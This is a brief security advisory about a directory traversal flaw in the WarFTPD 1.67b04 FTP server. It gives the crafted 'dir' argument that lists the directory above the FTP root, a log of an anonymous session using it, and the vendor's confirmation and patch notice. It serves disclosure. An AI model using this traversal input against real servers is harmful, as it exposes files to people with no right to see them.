Warftp 1.67b04 Directory Traversal

Overview:
by adding a special formed argument to the dir
command, it is possible to list the /…/ directory.

Detail:
the command is the following: dir *./…/…

Log:

Verbindung mit 10.17.3.44 wurde hergestellt.
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67-
04 Ready
220 Please enter your user name.
Benutzer (10.17.3.44:(none)): anonymous
331 User name okay. Give your full Email address as
password.
Kennwort:
230 User logged in, proceed.
ftp> dir
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection
for ls -l.
total 123
drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
-rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
-rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 …te
226 Transfer finished successfully. Data connection
closed.
FTP: 452 Bytes empfangen in 0,02Sekunden
22,60KB/s
ftp> cd …
550 Permission denied.
ftp> dir *./…/…
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection
for ls *./…/…
total 123
-rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42
WIN386.SWP
drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
…(cut here)
…
drwxrwxrwx 1 ftp ftp 0 Jan 15 22:36 delphi_zips
drwxrwxrwx 1 ftp ftp 0 Mar 4 15:00 web
drwxrwxrwx 1 ftp ftp 0 Mar 4 21:36 WEBS
226 Transfer finished successfully. Data connection
closed.
FTP: 2977 Bytes empfangen in 0,07Sekunden
42,53KB/s

the author has been contacted.
response: (slightly edited by se0020)

I can confirm that the problem is present in War FTP
Daemon 1.67.04.
After examining the problem, it looks like the exploit
is limited to listing the content one level up from the
root-directory. I was unable to access any of the
listed files or directories. I do however consider the
problem as serious, and wil release a fix within a few
hours.

the patch has been already released:
http://support.jgaa.com